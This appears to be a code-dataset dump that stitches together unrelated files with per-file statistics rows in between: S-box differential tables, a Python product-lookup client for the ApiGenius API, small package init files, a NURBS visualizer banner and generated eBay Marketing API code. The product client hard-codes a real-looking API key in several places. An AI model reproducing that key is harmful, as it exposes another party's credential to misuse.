32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 64, 160], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 192], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [2, 4, 8, 16, 33, 64, 128], [1, 2, 4, 8, 16, 96, 128], [1, 2, 4, 8, 16, 96, 128], [3, 4, 8, 16, 33, 34, 65, 96, 129, 130], [3, 6, 10, 12, 16, 33, 34, 36, 40, 68, 96, 130, 133, 136, 193], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], 
[1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [1, 2, 4, 8, 16, 32, 192], [1, 2, 4, 16, 72, 136, 192], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 32, 64, 144], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [2, 4, 8, 17, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 128], [2, 4, 8, 16, 32, 65, 129], [2, 4, 8, 32, 81, 129, 144], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 16, 32, 64, 128], [1, 2, 4, 8, 32, 64, 144], [1, 2, 24, 32, 64, 132], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 16, 64, 128], [1, 2, 4, 8, 48, 64, 128], [2, 4, 8, 17, 64, 128], [1, 4, 8, 16, 98, 128], [1, 4, 8, 16, 98, 128], [4, 10, 18, 24, 33, 40, 48, 65, 80, 98, 129, 144], [255])
ret.append((name, sbox, n, m, dppt))
name = '1-bit carry adder'
n, m = (3, 2)
sbox = [int(x + y + c >= 2) * 2 + (x ^ y ^ c) for x in range(2) for y in range(2) for c in range(2)]
dppt = ([0], [1, 2], [1, 2], [2], [1, 2], [2], [2], [3])
ret.append((name, sbox, n, m, dppt))
# bij
for n in range(5, 9):
for t in range(5):
n = m = n
sbox = list(range(2**n))
shuffle(sbox)
ret.append(("rand-bij", sbox, n, m, None))
# non-bij
for n in range(5, 9):
for m in range(n - 3, n + 3):
sbox = [randrange(2**m) for i in range(2**n)]
ret.append(("rand-nbij", sbox, n, m, None))
return ret
| 246.466667
| 7,795
| 0.435218
| 2,714
| 11,091
| 1.778187
| 0.107959
| 0.10775
| 0.157273
| 0.20058
| 0.728139
| 0.714671
| 0.699959
| 0.67385
| 0.635723
| 0.623912
| 0
| 0.536824
| 0.263006
| 11,091
| 44
| 7,796
| 252.068182
| 0.053585
| 0.000992
| 0
| 0.176471
| 0
| 0
| 0.004604
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.029412
| 0
| 0.088235
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77f92727d6ce9133123fa4078b0d5d5ec32b8d5b
| 22,613
|
py
|
Python
|
python/productDataApi.py
|
tunchunairarko/mern-btzapp
|
d8526525cfd69e2884464c30706a43977bafb22b
|
[
"MIT"
] | null | null | null |
python/productDataApi.py
|
tunchunairarko/mern-btzapp
|
d8526525cfd69e2884464c30706a43977bafb22b
|
[
"MIT"
] | null | null | null |
python/productDataApi.py
|
tunchunairarko/mern-btzapp
|
d8526525cfd69e2884464c30706a43977bafb22b
|
[
"MIT"
] | null | null | null |
import requests
import dpath # https://github.com/akesterson/dpath-python
from pprint import pprint # Needed for printing responses, can be deleted.
import re
import AzProductInformation
class ProductDataUPC(object):
def __init__(self,query):
self.keys={
'primary':'aed3a12f05464b8abb54c24d2750e377'
}
self.headers={
'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
}
self.url="https://api.apigenius.io/products/"
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
self.upc=''
def get_upc_from_mpn(self,query=''):
if not(query==''):
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
query_url=self.url+'/identifiers?mpn='+self.query
r=requests.get(query_url,headers=self.headers)
data=r.json()
if(data['status']==404):
return ''
return data['items']['upc']
class ProductDataAPIWithKeyword(object):
def __init__(self,query):
self.keys={
'primary':'aed3a12f05464b8abb54c24d2750e377'
}
self.headers={
'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
}
self.url="https://api.apigenius.io/products/"
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
self.image=[]
self.description=''
self.product_list=[]
def get_query_details(self):
endpoints=['identifiers','lookup','product-data','search']
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&api_key='+self.keys['primary']
# print(query_url)
r=requests.get(query_url,headers=self.headers)
data=r.json()
#print(data)
if(data['status']==404):
self.product_list.append({})
return
return data['items']['upc']
class ProductDataAPIWithMPN(object):
def __init__(self,query):
self.keys={
'primary':'aed3a12f05464b8abb54c24d2750e377'
}
self.headers={
'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
}
self.url="https://api.apigenius.io/products/"
for i in range(len(query)):
if(query[0]==' '):
query=query[1:]
else:
break
for i in range(len(query)-1,0,-1):
if(query[len(query)-1]==' '):
query=query[:-1]
else:
break
self.query = query
self.image=[]
self.description=''
self.product_list=[]
self.product = self.get_query_details()
def get_query_details(self):
endpoints=['identifiers','lookup','product-data','search']
query_url=self.url+endpoints[3]+'?keyword='+self.query+'&mpn='+self.query+'&api_key='+self.keys['primary']
# print(query_url)
r=requests.get(query_url,headers=self.headers)
data=r.json()
#print(data)
if(data['status']==404):
self.product_list.append({})
return
item = {'asinid': data['items']['upc'],
'title': data['items']['title'],
'rank': '',
'package_quantity': '1',
'retailer': data['items']['brand'],
'image': '',
'description':data['items']['description'],
'price': data['items']['lowest_pricing'],
'url': '',
'height': data['items']['dimension'],
'width':data['items']['dimension'],
'length':data['items']['dimension'],
'weight':data['items']['weight'],
'model_no':data['items']['mpn'],
'source':'',
'product_url':''
}
try:
item['source']=data['items']['pricing'][0]['seller']
except Exception as e:
print(e)
pass
try:
item['product_url']=data['items']['pricing'][0]['link']
except Exception as e:
print(e)
pass
try:
item['image']=data['items']['images'][0]
except Exception as e:
print(e)
pass
self.product_list.append(item)
class ProductDataAPI(object):
    """Look up product details from the ApiGenius products API.

    The query is routed by its shape:

    * all-digit, length 11-12            -> UPC lookup
    * ``SKY####``..``SKY######``         -> Best Choice Products SKU search
    * 10-char alphanumeric with a digit  -> possible Amazon ASIN (resolved
      via AzProductInformation, then searched by MPN)
    * anything else                      -> keyword search

    Results are appended to ``self.product_list``; an empty dict is appended
    when the API reports a 404.
    """

    def __init__(self, query):
        # NOTE(review): hard-coded API key; should come from config/env.
        self.keys = {
            'primary': 'aed3a12f05464b8abb54c24d2750e377'
        }
        self.headers = {
            'ApiGenius_API_Key': "aed3a12f05464b8abb54c24d2750e377"
        }
        self.url = "https://api.apigenius.io/products/"
        # Trim surrounding spaces (replaces the original char-by-char loops,
        # which removed only leading/trailing ' ' characters).
        self.query = query.strip(' ')
        self.image = []
        self.description = ''
        self.product_list = []
        # get_query_details() always returns None; it fills product_list as a
        # side effect, so self.product is always None.
        self.product = self.get_query_details()

    def _item_from(self, data):
        """Normalize a successful API payload into the product dict shape."""
        items = data['items']
        item = {'asinid': items['upc'],
                'title': items['title'],
                'rank': '',
                'package_quantity': '1',
                'retailer': items['brand'],
                'image': '',
                'description': items['description'],
                'price': items['lowest_pricing'],
                'url': '',
                # the API exposes a single 'dimension' field, so all three
                # axes are (intentionally) identical
                'height': items['dimension'],
                'width': items['dimension'],
                'length': items['dimension'],
                'weight': items['weight'],
                'model_no': items['mpn'],
                'source': '',
                'product_url': ''
                }
        # Best-effort enrichment (deduplicates the try/except triple that was
        # copy-pasted into every branch): a missing key/index leaves the ''
        # default and the error is logged.
        for field, getter in (
                ('source', lambda: items['pricing'][0]['seller']),
                ('product_url', lambda: items['pricing'][0]['link']),
                ('image', lambda: items['images'][0])):
            try:
                item[field] = getter()
            except Exception as e:
                print(e)
        return item

    def _get(self, endpoint, params):
        """GET one endpoint; returns (response, parsed JSON body)."""
        # Letting requests encode `params` fixes the original string-built
        # URLs, which broke for queries containing spaces, '&', etc.
        r = requests.get(self.url + endpoint, params=params, headers=self.headers)
        return r, r.json()

    def get_query_details(self):
        """Route self.query to the right endpoint and populate product_list."""
        endpoints = ['identifiers', 'lookup', 'product-data', 'search']
        api_key = self.keys['primary']
        ql = len(self.query)
        if self.query.isdigit():
            if 11 <= ql < 13:
                # UPC confirmed: exact lookup by UPC (this branch keys the
                # 404 check off the HTTP status, matching the original).
                r, data = self._get(endpoints[1], {'upc': self.query, 'api_key': api_key})
                print(r.status_code)
                if r.status_code == 404:
                    self.product_list.append({})
                    return
            else:
                # Numeric but not UPC-length: fall back to keyword+MPN search.
                r, data = self._get(endpoints[3],
                                    {'keyword': self.query, 'mpn': self.query, 'api_key': api_key})
                print(r.status_code)
                if data['status'] == 404:
                    self.product_list.append({})
                    return
            self.product_list.append(self._item_from(data))
            return
        if re.match(r'sky[0-9]{4,6}$', self.query, flags=re.IGNORECASE):
            # Best Choice Products SKU.
            r, data = self._get(endpoints[3],
                                {'keyword': self.query, 'mpn': self.query, 'api_key': api_key})
            print(r.status_code)
            if data['status'] == 404:
                self.product_list.append({})
                return
            self.product_list.append(self._item_from(data))
            return
        if ql == 10 and any(char.isdigit() for char in self.query):
            # Possibly an Amazon ASIN.
            # NOTE(review): the pattern is uppercase-only, so lowercase input
            # (e.g. 'x00192KM3T' as used in main()) matches nothing and
            # product_list stays empty -- confirm whether re.IGNORECASE was
            # intended here.
            if re.match(r'([A-Z0-9]{10})', self.query):
                api = AzProductInformation.AzProductInformation(self.query)
                prod_search = api.product_list[0]
                if prod_search['model_no'] is not None:
                    # Resolve the ASIN to its manufacturer part number first.
                    mpn = prod_search['model_no']
                    params = {'keyword': mpn, 'mpn': mpn, 'api_key': api_key}
                else:
                    params = {'keyword': self.query, 'api_key': api_key}
                r, data = self._get(endpoints[3], params)
                print(r.status_code)
                if data['status'] == 404:
                    self.product_list.append({})
                    return
                self.product_list.append(self._item_from(data))
            return
        # General keyword search.
        if self.query.find(' ') == -1:
            # Single token: also try it as an MPN.
            r, data = self._get(endpoints[3],
                                {'keyword': self.query, 'mpn': self.query, 'api_key': api_key})
            if data['status'] == 404:
                self.product_list.append({})
                return
            self.product_list.append(self._item_from(data))
            return
        r, data = self._get(endpoints[3], {'keyword': self.query, 'api_key': api_key})
        if data['status'] == 404:
            self.product_list.append({})
            return
        self.product_list.append(self._item_from(data))
def main():
    """Manual smoke test: fetch one product and dump what came back."""
    # p = ProductDataUPC('SKY1263')
    lookup = ProductDataAPIWithKeyword('x00192KM3T')
    print(lookup.product_list)
# Script entry point.
if __name__ == '__main__':
    main()
| 41.721402
| 135
| 0.411489
| 1,939
| 22,613
| 4.71738
| 0.080454
| 0.106264
| 0.046463
| 0.049196
| 0.889472
| 0.881929
| 0.870559
| 0.866186
| 0.851099
| 0.84596
| 0
| 0.029898
| 0.440897
| 22,613
| 542
| 136
| 41.721402
| 0.693585
| 0.088356
| 0
| 0.891949
| 0
| 0
| 0.166521
| 0.012454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019068
| false
| 0.050847
| 0.010593
| 0
| 0.065678
| 0.065678
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
77f93961df00cd63e5db98ca11469933e2c1b639
| 124
|
py
|
Python
|
py/src/datacentric/types/time/__init__.py
|
datacentricorg/datacentric
|
b9e2dedfac35759ea09bb5653095daba5861512e
|
[
"Apache-2.0"
] | 1
|
2019-08-08T01:27:47.000Z
|
2019-08-08T01:27:47.000Z
|
py/src/datacentric/types/time/__init__.py
|
datacentricorg/datacentric
|
b9e2dedfac35759ea09bb5653095daba5861512e
|
[
"Apache-2.0"
] | null | null | null |
py/src/datacentric/types/time/__init__.py
|
datacentricorg/datacentric
|
b9e2dedfac35759ea09bb5653095daba5861512e
|
[
"Apache-2.0"
] | null | null | null |
from datacentric.types.time.iso_day_of_week import IsoDayOfWeek
from datacentric.types.time.local_minute import LocalMinute
| 41.333333
| 63
| 0.887097
| 18
| 124
| 5.888889
| 0.722222
| 0.283019
| 0.377358
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 124
| 2
| 64
| 62
| 0.913793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
7af14fd96cfb76681c30796807edc66ed015682c
| 46
|
py
|
Python
|
frarch/utils/logging/__init__.py
|
victorbadenas/frarch
|
e75e2a63aaf14cf797ffffc901ca382b3d88b7b0
|
[
"Apache-2.0"
] | 1
|
2021-12-21T11:00:28.000Z
|
2021-12-21T11:00:28.000Z
|
frarch/utils/logging/__init__.py
|
vbadenas/frarch
|
3ce8cfad90b09153cbd22dee975731cae13e3ba7
|
[
"Apache-2.0"
] | 5
|
2021-11-23T11:08:28.000Z
|
2021-12-21T14:02:14.000Z
|
frarch/utils/logging/__init__.py
|
vbadenas/frarch
|
3ce8cfad90b09153cbd22dee975731cae13e3ba7
|
[
"Apache-2.0"
] | 1
|
2022-03-20T23:47:16.000Z
|
2022-03-20T23:47:16.000Z
|
from .create_logger import create_logger_file
| 23
| 45
| 0.891304
| 7
| 46
| 5.428571
| 0.714286
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bb2aaa2685641d5ed14dc44f506d92e20ddfe00b
| 865
|
py
|
Python
|
nurbsvisualizer/__init__.py
|
FernandezErbes/nurbsvisualizer
|
d69e214448fa274ac6cd30b614e161e8bc22bbe6
|
[
"MIT"
] | null | null | null |
nurbsvisualizer/__init__.py
|
FernandezErbes/nurbsvisualizer
|
d69e214448fa274ac6cd30b614e161e8bc22bbe6
|
[
"MIT"
] | null | null | null |
nurbsvisualizer/__init__.py
|
FernandezErbes/nurbsvisualizer
|
d69e214448fa274ac6cd30b614e161e8bc22bbe6
|
[
"MIT"
] | null | null | null |
# Package initializer: import the visualizer submodules and print a banner.
import nurbsvisualizer.bsplinegeometry
import nurbsvisualizer.nurbsgeometry
import nurbsvisualizer.utilities
import nurbsvisualizer.visualizer
import sys
# Side effect at import time: make the parent directory importable.
sys.path.append('..')
# ASCII-art startup banner ("NurbsVisualizer").
print(" \n")
print(" _ __ __ _ ___ ___ ")
print(" / | / /_ _______/ /_ ____| | / (_)______ ______ _/ (_)___ ___ _____")
print(" / |/ / / / / ___/ __ \/ ___/ | / / / ___/ / / / __ `/ / /_ / / _ \/ ___/")
print(" / /| / /_/ / / / /_/ (__ )| |/ / (__ ) /_/ / /_/ / / / / /_/ __/ / ")
print("/_/ |_/\__,_/_/ /_.___/____/ |___/_/____/\__,_/\__,_/_/_/ /___/\___/_/ ")
print("\n Created by Federico Fernández Erbes ")
print(" All results without warranty \n")
| 54.0625
| 85
| 0.42659
| 37
| 865
| 6.810811
| 0.540541
| 0.198413
| 0.238095
| 0.238095
| 0.119048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 865
| 15
| 86
| 57.666667
| 0.485549
| 0
| 0
| 0
| 0
| 0.285714
| 0.705202
| 0.03237
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.357143
| 0
| 0.357143
| 0.571429
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
248b72f8b6d7d19ce9c4cd65f7163713f784ccee
| 92,017
|
py
|
Python
|
src/ebay_rest/api/sell_marketing/api/ad_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_marketing/api/ad_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_marketing/api/ad_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Marketing API
<p>The <i>Marketing API </i> offers two platforms that sellers can use to promote and advertise their products:</p> <ul><li><b>Promoted Listings</b> is an eBay ad service that lets sellers set up <i>ad campaigns </i> for the products they want to promote. eBay displays the ads in search results and in other marketing modules as <b>SPONSORED</b> listings. If an item in a Promoted Listings campaign sells, the seller is assessed a Promoted Listings fee, which is a seller-specified percentage applied to the sales price. For complete details, see <a href=\"/api-docs/sell/static/marketing/promoted-listings.html\">Promoted Listings</a>.</li> <li><b>Promotions Manager</b> gives sellers a way to offer discounts on specific items as a way to attract buyers to their inventory. Sellers can set up discounts (such as \"20% off\" and other types of offers) on specific items or on an entire customer order. To further attract buyers, eBay prominently displays promotion <i>teasers</i> throughout buyer flows. For complete details, see <a href=\"/api-docs/sell/static/marketing/promotions-manager.html\">Promotions Manager</a>.</li></ul> <p><b>Marketing reports</b>, on both the Promoted Listings and Promotions Manager platforms, give sellers information that shows the effectiveness of their marketing strategies. The data gives sellers the ability to review and fine tune their marketing efforts.</p> <p class=\"tablenote\"><b>Important!</b> Sellers must have an active eBay Store subscription, and they must accept the <b>Terms and Conditions</b> before they can make requests to these APIs in the Production environment. 
There are also site-specific listings requirements and restrictions associated with these marketing tools, as listed in the \"requirements and restrictions\" sections for <a href=\"/api-docs/sell/marketing/static/overview.html#PL-requirements\">Promoted Listings</a> and <a href=\"/api-docs/sell/marketing/static/overview.html#PM-requirements\">Promotions Manager</a>.</p> <p>The table below lists all the Marketing API calls grouped by resource.</p> # noqa: E501
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...sell_marketing.api_client import ApiClient
class AdApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def bulk_create_ads_by_inventory_reference(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_create_ads_by_inventory_reference # noqa: E501
This method adds multiple listings that are managed with the Inventory API to an existing Promoted Listings campaign. For each listing specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its inventoryReferenceId and inventoryReferenceType, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads to with using the campaign_id path parameter. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). You can specify a maximum of 500 items per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_ads_by_inventory_reference(body, campaign_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateAdsByInventoryReferenceRequest body: The container for the bulk request to create ads for eBay inventory reference IDs. eBay inventory reference IDs are seller-defined IDs used by theInventory API. (required)
:param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
:return: BulkCreateAdsByInventoryReferenceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_create_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
else:
(data) = self.bulk_create_ads_by_inventory_reference_with_http_info(body, campaign_id, **kwargs) # noqa: E501
return data
    def bulk_create_ads_by_inventory_reference_with_http_info(self, body, campaign_id, **kwargs): # noqa: E501
        """bulk_create_ads_by_inventory_reference # noqa: E501
        This method adds multiple listings that are managed with the Inventory API to an existing Promoted Listings campaign. For each listing specified in the request, this method: Creates an ad for the listing. Sets the bid percentage (also known as the ad rate) for the ad. Associates the ad with the specified campaign. To create an ad for a listing, specify its inventoryReferenceId and inventoryReferenceType, plus the bidPercentage for the ad in the payload of the request. Specify the campaign to associate the ads to with using the campaign_id path parameter. In the Inventory API, an inventory reference ID is either a seller-defined SKU value or an inventoryItemGroupKey (a seller-defined ID for a multiple-variation listing). You can specify a maximum of 500 items per call and each campaign can have ads for a maximum of 50,000 items. Be aware when using this call that each variation in a multiple-variation listing creates an individual ad. Use createCampaign to create a new campaign and use getCampaigns to get a list of existing campaigns. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.bulk_create_ads_by_inventory_reference_with_http_info(body, campaign_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param BulkCreateAdsByInventoryReferenceRequest body: The container for the bulk request to create ads for eBay inventory reference IDs. eBay inventory reference IDs are seller-defined IDs used by theInventory API. (required)
        :param str campaign_id: A unique eBay-assigned ID for an ad campaign that's generated when a campaign is created. Get a seller's campaign IDs by calling getCampaigns. (required)
        :return: BulkCreateAdsByInventoryReferenceResponse
        If the method is called asynchronously,
        returns the request thread.
        """
        # NOTE(review): auto-generated by swagger-codegen; manual edits here
        # will be lost on regeneration.
        # Accepted kwargs: the documented parameters plus client plumbing flags.
        all_params = ['body', 'campaign_id'] # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots self/body/campaign_id/kwargs for uniform handling.
        params = locals()
        # Reject any keyword argument that is not in the accepted list.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method bulk_create_ads_by_inventory_reference" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `bulk_create_ads_by_inventory_reference`") # noqa: E501
        # verify the required parameter 'campaign_id' is set
        if ('campaign_id' not in params or
                params['campaign_id'] is None):
            raise ValueError("Missing the required parameter `campaign_id` when calling `bulk_create_ads_by_inventory_reference`") # noqa: E501
        collection_formats = {}
        # campaign_id is substituted into the resource path below.
        path_params = {}
        if 'campaign_id' in params:
            path_params['campaign_id'] = params['campaign_id'] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json']) # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
            ['application/json']) # noqa: E501
        # Authentication setting
        auth_settings = ['api_auth'] # noqa: E501
        # Delegate the actual HTTP call (and async handling) to the client.
        return self.api_client.call_api(
            '/ad_campaign/{campaign_id}/bulk_create_ads_by_inventory_reference', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='BulkCreateAdsByInventoryReferenceResponse', # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def bulk_create_ads_by_listing_id(self, body, campaign_id, **kwargs): # noqa: E501
"""bulk_create_ads_by_listing_id # noqa: E501
